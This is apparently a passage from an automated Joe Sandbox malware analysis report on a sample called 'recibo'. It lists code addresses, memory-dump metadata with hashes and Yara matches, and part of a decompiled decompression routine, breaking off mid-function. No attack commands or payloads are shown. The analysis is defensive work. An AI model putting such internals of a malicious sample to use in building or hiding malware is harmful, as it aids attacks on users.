                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040726d
                                                                                  0x0040726d
                                                                                  0x00407270
                                                                                  0x00407275
                                                                                  0x00407277
                                                                                  0x0040727d
                                                                                  0x0040727f
                                                                                  0x00407294
                                                                                  0x00407296
                                                                                  0x00407296
                                                                                  0x00407281
                                                                                  0x00407287
                                                                                  0x00407289
                                                                                  0x0040728b
                                                                                  0x0040728b
                                                                                  0x00407298
                                                                                  0x0040729c
                                                                                  0x0040729f
                                                                                  0x004072a5
                                                                                  0x004072a5
                                                                                  0x004072a8
                                                                                  0x004072a8
                                                                                  0x004072a8
                                                                                  0x004072aa
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004072b0
                                                                                  0x004072b0
                                                                                  0x004072b6
                                                                                  0x004072b8
                                                                                  0x004072dd
                                                                                  0x004072e0
                                                                                  0x004072e6
                                                                                  0x004072eb
                                                                                  0x004072f1
                                                                                  0x004072f7
                                                                                  0x004072f9
                                                                                  0x004072fc
                                                                                  0x00407305
                                                                                  0x0040730b
                                                                                  0x0040730b
                                                                                  0x004072fe
                                                                                  0x00407300
                                                                                  0x00407302
                                                                                  0x00407302
                                                                                  0x0040730d
                                                                                  0x00407313
                                                                                  0x00407315
                                                                                  0x00407318
                                                                                  0x0040731a
                                                                                  0x00407320
                                                                                  0x00407322
                                                                                  0x00407324
                                                                                  0x00407326
                                                                                  0x00407328
                                                                                  0x0040732b
                                                                                  0x00407334
                                                                                  0x00407337
                                                                                  0x00407337
                                                                                  0x0040732d
                                                                                  0x0040732d
                                                                                  0x00407330
                                                                                  0x00407330
                                                                                  0x0040732b
                                                                                  0x00407322
                                                                                  0x00407339
                                                                                  0x0040733b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040733b
                                                                                  0x004072ba
                                                                                  0x004072ba
                                                                                  0x004072c0
                                                                                  0x004072c6
                                                                                  0x004072c8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004072ca
                                                                                  0x004072ca
                                                                                  0x004072cc
                                                                                  0x004072ce
                                                                                  0x004072d7
                                                                                  0x004072d7
                                                                                  0x004072d0
                                                                                  0x004072d0
                                                                                  0x004072d3
                                                                                  0x004072d3
                                                                                  0x004072d9
                                                                                  0x004072db
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407341
                                                                                  0x00407341
                                                                                  0x00407346
                                                                                  0x00407348
                                                                                  0x00407349
                                                                                  0x0040734a
                                                                                  0x0040734b
                                                                                  0x00407351
                                                                                  0x00407354
                                                                                  0x00407357
                                                                                  0x0040735a
                                                                                  0x0040735c
                                                                                  0x00407362
                                                                                  0x00407362
                                                                                  0x00407365
                                                                                  0x00407365
                                                                                  0x00407365
                                                                                  0x00407365
                                                                                  0x0040736e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407373
                                                                                  0x00407373
                                                                                  0x00407376
                                                                                  0x00407379
                                                                                  0x0040737b
                                                                                  0x00407412
                                                                                  0x00407412
                                                                                  0x00407415
                                                                                  0x00407417
                                                                                  0x00407418
                                                                                  0x00407419
                                                                                  0x0040741c
                                                                                  0x00000000
                                                                                  0x0040741c
                                                                                  0x00407381
                                                                                  0x00407381
                                                                                  0x00407387
                                                                                  0x00407389
                                                                                  0x004073ae
                                                                                  0x004073b1
                                                                                  0x004073b7
                                                                                  0x004073bc
                                                                                  0x004073c2
                                                                                  0x004073c8
                                                                                  0x004073ca
                                                                                  0x004073cd
                                                                                  0x004073d6
                                                                                  0x004073dc
                                                                                  0x004073dc
                                                                                  0x004073cf
                                                                                  0x004073d1
                                                                                  0x004073d3
                                                                                  0x004073d3
                                                                                  0x004073de
                                                                                  0x004073e4
                                                                                  0x004073e6
                                                                                  0x004073e9
                                                                                  0x004073eb
                                                                                  0x004073f1
                                                                                  0x004073f3
                                                                                  0x004073f5
                                                                                  0x004073f7
                                                                                  0x004073f9
                                                                                  0x004073fc
                                                                                  0x00407405
                                                                                  0x00407408
                                                                                  0x00407408
                                                                                  0x004073fe
                                                                                  0x004073fe
                                                                                  0x00407401
                                                                                  0x00407401
                                                                                  0x004073fc
                                                                                  0x004073f3
                                                                                  0x0040740a
                                                                                  0x0040740c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040740c
                                                                                  0x0040738b
                                                                                  0x0040738b
                                                                                  0x00407391
                                                                                  0x00407397
                                                                                  0x00407399
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040739b
                                                                                  0x0040739b
                                                                                  0x0040739d
                                                                                  0x0040739f
                                                                                  0x004073a6
                                                                                  0x004073a6
                                                                                  0x004073a8
                                                                                  0x004073a1
                                                                                  0x004073a1
                                                                                  0x004073a3
                                                                                  0x004073a3
                                                                                  0x004073aa
                                                                                  0x004073ac
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407424
                                                                                  0x00407424
                                                                                  0x00407427
                                                                                  0x00407429
                                                                                  0x0040742c
                                                                                  0x0040742f
                                                                                  0x0040742f
                                                                                  0x0040742f
                                                                                  0x0040742f
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406add
                                                                                  0x00406ac1
                                                                                  0x00000000
                                                                                  0x00406ac7
                                                                                  0x00406aca
                                                                                  0x00406ad4
                                                                                  0x00406ad7
                                                                                  0x00406ada
                                                                                  0x00000000
                                                                                  0x00406ada
                                                                                  0x00406ac1
                                                                                  0x00406ae5
                                                                                  0x00406ae8
                                                                                  0x00406aec
                                                                                  0x00406af6
                                                                                  0x00406b00
                                                                                  0x00406b03
                                                                                  0x00406b09
                                                                                  0x00406c3d
                                                                                  0x00406c3f
                                                                                  0x00406c45
                                                                                  0x00406c48
                                                                                  0x00406c4b
                                                                                  0x00000000
                                                                                  0x00406c4b
                                                                                  0x00406b0f
                                                                                  0x00406b0f
                                                                                  0x00406b10
                                                                                  0x00406b68
                                                                                  0x00406b68
                                                                                  0x00406b6f
                                                                                  0x00406c15
                                                                                  0x00406c15
                                                                                  0x00406c1a
                                                                                  0x00406c1d
                                                                                  0x00406c22
                                                                                  0x00406c25
                                                                                  0x00406c2a
                                                                                  0x00406c2d
                                                                                  0x00406c32
                                                                                  0x00406c35
                                                                                  0x00406c35
                                                                                  0x00000000
                                                                                  0x00406b75
                                                                                  0x00406b75
                                                                                  0x00406b75
                                                                                  0x00406b75
                                                                                  0x00406b79
                                                                                  0x00406b79
                                                                                  0x00406b9b
                                                                                  0x00406b9e
                                                                                  0x00406ba0
                                                                                  0x00406ba3
                                                                                  0x00406ba8
                                                                                  0x00406b7e
                                                                                  0x00406b7e
                                                                                  0x00406b83
                                                                                  0x00406b85
                                                                                  0x00406b87
                                                                                  0x00406b8c
                                                                                  0x00406b92
                                                                                  0x00406b97
                                                                                  0x00406b99
                                                                                  0x00406b99
                                                                                  0x00406b8e
                                                                                  0x00406b8e
                                                                                  0x00406b8e
                                                                                  0x00406b8c
                                                                                  0x00000000
                                                                                  0x00406baa
                                                                                  0x00406bd7
                                                                                  0x00406bdc
                                                                                  0x00406bde
                                                                                  0x00406bdf
                                                                                  0x00406be1
                                                                                  0x00406be2
                                                                                  0x00406be2
                                                                                  0x00406be2
                                                                                  0x00406c0a
                                                                                  0x00406c0f
                                                                                  0x00406c0f
                                                                                  0x00000000
                                                                                  0x00406c0f
                                                                                  0x00406ba8
                                                                                  0x00406b6f
                                                                                  0x00406b12
                                                                                  0x00406b12
                                                                                  0x00406b13
                                                                                  0x00406b5d
                                                                                  0x00000000
                                                                                  0x00406b5d
                                                                                  0x00406b15
                                                                                  0x00406b16
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406c72
                                                                                  0x00406c72
                                                                                  0x00406c72
                                                                                  0x00406c75
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406c52
                                                                                  0x00406c52
                                                                                  0x00406c56
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406c5c
                                                                                  0x00406c5c
                                                                                  0x00406c5f
                                                                                  0x00406c62
                                                                                  0x00406c67
                                                                                  0x00406c69
                                                                                  0x00406c6c
                                                                                  0x00406c6f
                                                                                  0x00406c6f
                                                                                  0x00406c6f
                                                                                  0x00406c77
                                                                                  0x00406c77
                                                                                  0x00406c7a
                                                                                  0x00406c7c
                                                                                  0x00406c81
                                                                                  0x00406c84
                                                                                  0x00406c86
                                                                                  0x00406c89
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406c8f
                                                                                  0x00406c8f
                                                                                  0x00406c91
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406c97
                                                                                  0x00406c97
                                                                                  0x00406c9b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406ca1
                                                                                  0x00406ca1
                                                                                  0x00406ca4
                                                                                  0x00406ca6
                                                                                  0x00406d44
                                                                                  0x00406d44
                                                                                  0x00406d47
                                                                                  0x00406d49
                                                                                  0x00406d49
                                                                                  0x00406d4c
                                                                                  0x00406d4f
                                                                                  0x00406d51
                                                                                  0x00406d53
                                                                                  0x00406d55
                                                                                  0x00406d55
                                                                                  0x00406d5e
                                                                                  0x00406d63
                                                                                  0x00406d66
                                                                                  0x00406d69
                                                                                  0x00406d6c
                                                                                  0x00406d6f
                                                                                  0x00406d6f
                                                                                  0x00406d6f
                                                                                  0x00406d72
                                                                                  0x00406d78
                                                                                  0x00406d78
                                                                                  0x00406d7e
                                                                                  0x00406d7e
                                                                                  0x00406d7e
                                                                                  0x00000000
                                                                                  0x00406d72
                                                                                  0x00406cac
                                                                                  0x00406cac
                                                                                  0x00406cb2
                                                                                  0x00406cb5
                                                                                  0x00406cb7
                                                                                  0x00406ce2
                                                                                  0x00406ce5
                                                                                  0x00406ceb
                                                                                  0x00406cf0
                                                                                  0x00406cf6
                                                                                  0x00406cfc
                                                                                  0x00406cfe
                                                                                  0x00406d01
                                                                                  0x00406d0a
                                                                                  0x00406d10
                                                                                  0x00406d10
                                                                                  0x00406d03
                                                                                  0x00406d05
                                                                                  0x00406d07
                                                                                  0x00406d07
                                                                                  0x00406d12
                                                                                  0x00406d18
                                                                                  0x00406d1b
                                                                                  0x00406d1d
                                                                                  0x00406d1f
                                                                                  0x00406d25
                                                                                  0x00406d27
                                                                                  0x00406d29
                                                                                  0x00406d2c
                                                                                  0x00406d35
                                                                                  0x00406d35
                                                                                  0x00406d37
                                                                                  0x00406d2e
                                                                                  0x00406d2e
                                                                                  0x00406d31
                                                                                  0x00406d31
                                                                                  0x00406d39
                                                                                  0x00406d39
                                                                                  0x00406d27
                                                                                  0x00406d3c
                                                                                  0x00406d3e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406d3e
                                                                                  0x00406cb9
                                                                                  0x00406cb9
                                                                                  0x00406cbf
                                                                                  0x00406cc5
                                                                                  0x00406cc7
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406cc9
                                                                                  0x00406cc9
                                                                                  0x00406ccb
                                                                                  0x00406ccd
                                                                                  0x00406cd0
                                                                                  0x00406cd7
                                                                                  0x00406cd7
                                                                                  0x00406cd9
                                                                                  0x00406cd2
                                                                                  0x00406cd2
                                                                                  0x00406cd4
                                                                                  0x00406cd4
                                                                                  0x00406cdb
                                                                                  0x00406cdd
                                                                                  0x00406ce0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406de4
                                                                                  0x00406de7
                                                                                  0x00406dea
                                                                                  0x00406df0
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406fc7
                                                                                  0x00406fc7
                                                                                  0x00406fc7
                                                                                  0x00406fca
                                                                                  0x00406fcd
                                                                                  0x00406fcf
                                                                                  0x00406fd2
                                                                                  0x00406fd8
                                                                                  0x00406fdf
                                                                                  0x00406fe1
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406eb5
                                                                                  0x00406eb5
                                                                                  0x00406edd
                                                                                  0x00406edd
                                                                                  0x00406edd
                                                                                  0x00406edf
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406ebd
                                                                                  0x00406ebd
                                                                                  0x00406ec1
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406ec7
                                                                                  0x00406ec7
                                                                                  0x00406eca
                                                                                  0x00406ecd
                                                                                  0x00406ed0
                                                                                  0x00406ed2
                                                                                  0x00406ed4
                                                                                  0x00406ed7
                                                                                  0x00406eda
                                                                                  0x00406eda
                                                                                  0x00406eda
                                                                                  0x00406ee1
                                                                                  0x00406ee1
                                                                                  0x00406ee9
                                                                                  0x00406eec
                                                                                  0x00406ef2
                                                                                  0x00406ef5
                                                                                  0x00406ef9
                                                                                  0x00406efd
                                                                                  0x00406f00
                                                                                  0x00406f03
                                                                                  0x00406f1b
                                                                                  0x00406f1b
                                                                                  0x00406f1e
                                                                                  0x00406f2c
                                                                                  0x00406f2f
                                                                                  0x00406f20
                                                                                  0x00406f20
                                                                                  0x00406f22
                                                                                  0x00406f29
                                                                                  0x00406f29
                                                                                  0x00406f58
                                                                                  0x00406f58
                                                                                  0x00406f58
                                                                                  0x00406f5b
                                                                                  0x00406f5d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406f38
                                                                                  0x00406f38
                                                                                  0x00406f3c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406f42
                                                                                  0x00406f42
                                                                                  0x00406f45
                                                                                  0x00406f48
                                                                                  0x00406f4b
                                                                                  0x00406f4d
                                                                                  0x00406f4f
                                                                                  0x00406f52
                                                                                  0x00406f55
                                                                                  0x00406f55
                                                                                  0x00406f55
                                                                                  0x00406f5f
                                                                                  0x00406f5f
                                                                                  0x00406f61
                                                                                  0x00406f63
                                                                                  0x00406f6e
                                                                                  0x00406f71
                                                                                  0x00406f74
                                                                                  0x00406f76
                                                                                  0x00406f78
                                                                                  0x00406f7a
                                                                                  0x00406f7d
                                                                                  0x00406f80
                                                                                  0x00406f85
                                                                                  0x00406f88
                                                                                  0x00406f8b
                                                                                  0x00406f8e
                                                                                  0x00406f95
                                                                                  0x00406f98
                                                                                  0x00406f9a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406fa0
                                                                                  0x00406fa0
                                                                                  0x00406fa4
                                                                                  0x00406fb5
                                                                                  0x00406fb5
                                                                                  0x00406fb5
                                                                                  0x00406fb7
                                                                                  0x00406fb7
                                                                                  0x00406fbb
                                                                                  0x00406fbb
                                                                                  0x00406fbb
                                                                                  0x00406fbd
                                                                                  0x00406fbe
                                                                                  0x00406fc1
                                                                                  0x00406fc1
                                                                                  0x00406fc1
                                                                                  0x00406fc4
                                                                                  0x00000000
                                                                                  0x00406fc4
                                                                                  0x00406fa6
                                                                                  0x00406fa6
                                                                                  0x00406fa9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406faf
                                                                                  0x00406faf
                                                                                  0x00000000
                                                                                  0x00406faf
                                                                                  0x00406f05
                                                                                  0x00406f05
                                                                                  0x00406f07
                                                                                  0x00406f09
                                                                                  0x00406f0c
                                                                                  0x00406f0f
                                                                                  0x00406f13
                                                                                  0x00406f13
                                                                                  0x00406fe7
                                                                                  0x00406fe7
                                                                                  0x00406fea
                                                                                  0x00406ff1
                                                                                  0x00406ff5
                                                                                  0x00406ff7
                                                                                  0x00406ffa
                                                                                  0x00406ffd
                                                                                  0x00407002
                                                                                  0x00407005
                                                                                  0x00407007
                                                                                  0x00407008
                                                                                  0x0040700b
                                                                                  0x00407016
                                                                                  0x00407019
                                                                                  0x00407030
                                                                                  0x00407035
                                                                                  0x0040703c
                                                                                  0x00407041
                                                                                  0x00407045
                                                                                  0x00407047
                                                                                  0x00407047
                                                                                  0x00407047
                                                                                  0x0040704a
                                                                                  0x0040704c
                                                                                  0x00000000
                                                                                  0x00407052
                                                                                  0x00407052
                                                                                  0x00407056
                                                                                  0x00407061
                                                                                  0x00407074
                                                                                  0x00407079
                                                                                  0x0040707e
                                                                                  0x00407080
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407086
                                                                                  0x00407086
                                                                                  0x00407089
                                                                                  0x0040708b
                                                                                  0x00407099
                                                                                  0x00407099
                                                                                  0x0040709c
                                                                                  0x0040709c
                                                                                  0x0040709f
                                                                                  0x004070a2
                                                                                  0x004070a5
                                                                                  0x004070a8
                                                                                  0x004070ab
                                                                                  0x004070ae
                                                                                  0x00000000
                                                                                  0x004070ae
                                                                                  0x0040708d
                                                                                  0x0040708d
                                                                                  0x00407093
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407093
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407432
                                                                                  0x00407432
                                                                                  0x00407438
                                                                                  0x0040743e
                                                                                  0x00407443
                                                                                  0x00407449
                                                                                  0x0040744f
                                                                                  0x00407451
                                                                                  0x00407454
                                                                                  0x0040745d
                                                                                  0x00407463
                                                                                  0x00407463
                                                                                  0x00407456
                                                                                  0x00407458
                                                                                  0x0040745a
                                                                                  0x0040745a
                                                                                  0x00407465
                                                                                  0x00407467
                                                                                  0x0040746a
                                                                                  0x004074a5
                                                                                  0x004074a5
                                                                                  0x00000000
                                                                                  0x0040746c
                                                                                  0x0040746c
                                                                                  0x0040746c
                                                                                  0x00407472
                                                                                  0x00407475
                                                                                  0x00407477
                                                                                  0x004074ac
                                                                                  0x004074ae
                                                                                  0x00000000
                                                                                  0x004074ae
                                                                                  0x00000000
                                                                                  0x00407477
                                                                                  0x00000000
                                                                                  0x00406ab6
                                                                                  0x00407484
                                                                                  0x00000000
                                                                                  0x00407484
                                                                                  0x00406e98
                                                                                  0x00406e9a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406e9c
                                                                                  0x00406e9c
                                                                                  0x00406e9f
                                                                                  0x00000000
                                                                                  0x00406e9f
                                                                                  0x00406de4
                                                                                  0x00406da5
                                                                                  0x00407489
                                                                                  0x0040748c
                                                                                  0x0040748e
                                                                                  0x00407497
                                                                                  0x0040749d
                                                                                  0x00000000

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                                  • Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
                                                                                  • Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                                  • Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB0D10 Relevance: .3, Instructions: 333COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 79e9516c95eecf4bf6f0541cf753394ddc62565a31d2195b29ab92ed68512d3e
                                                                                  • Instruction ID: 601d332e090b928a5418c98928e7a96d81114c0845f0fd20726a42344fd72899
                                                                                  • Opcode Fuzzy Hash: 79e9516c95eecf4bf6f0541cf753394ddc62565a31d2195b29ab92ed68512d3e
                                                                                  • Instruction Fuzzy Hash: 9581F145E3D30599EB933036C1753E71385CF172C1E66875BCC6BB2865B71B0A8E88C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CC475D Relevance: .3, Instructions: 332COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: b8a78140ac20f2688f1fcb26d056ee847255726ee910f2af2c843af7a5ecf8c8
                                                                                  • Instruction ID: 7f9bb257a6694a35912ba73cd3568918db078c9509425c33060779fb8603a0e2
                                                                                  • Opcode Fuzzy Hash: b8a78140ac20f2688f1fcb26d056ee847255726ee910f2af2c843af7a5ecf8c8
                                                                                  • Instruction Fuzzy Hash: E1B18B71A403569FDF359E39C9A43EA77A3AF56390FB5803ECC899B104D3718A85CB42
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB0E2F Relevance: .3, Instructions: 321COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cf10cb2d479ba2b8f4d3ada516a85af6fb6e4c65f1c34ca0f6c20ff0cc0e9454
                                                                                  • Instruction ID: ec1a10ea1f3d438189aea7f8bb3f10ef15bc012aeb8440d6f88be42188a5f14b
                                                                                  • Opcode Fuzzy Hash: cf10cb2d479ba2b8f4d3ada516a85af6fb6e4c65f1c34ca0f6c20ff0cc0e9454
                                                                                  • Instruction Fuzzy Hash: 7271BF45E3D30A98EB53307685B53E71386CF132D1D66876BCC5B72865B71B0A8E88C7
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB0D7D Relevance: .3, Instructions: 314COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 04fd2ebb63a2329f6a318fa634aac879fc8c8e55622499e6ab7b506ed5908afd
                                                                                  • Instruction ID: cc59ee2d5027f05b71e0d3e6dfed1071d636c01566783f7a60e560efa055828a
                                                                                  • Opcode Fuzzy Hash: 04fd2ebb63a2329f6a318fa634aac879fc8c8e55622499e6ab7b506ed5908afd
                                                                                  • Instruction Fuzzy Hash: FC810345E3D30599E753307685B53E71386CF131C1E66875BCC6B72865B70B0A8E84C7
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 02CB0DC3 Relevance: .3, Instructions: 313COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23385776867.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02CB0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_2cb0000_recibo.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b0f6ddd57a9381dec213bbf00961f6a16c27ca37cffb78f5b8b91cabd3fbbf0e
                                                                                  • Instruction ID: 7f8c335ad2898545fcc791d35cb297a38804dc4b26c5238ea6f5e8c850825f6e
                                                                                  • Opcode Fuzzy Hash: b0f6ddd57a9381dec213bbf00961f6a16c27ca37cffb78f5b8b91cabd3fbbf0e
                                                                                  • Instruction Fuzzy Hash: C481C045E3D30998EB93307681B53E71786CF172C1E66876BCC5B72865B71B0A8E84C6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0040755C Relevance: .3, Instructions: 300COMMONCrypto
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E0040755C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x432190 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
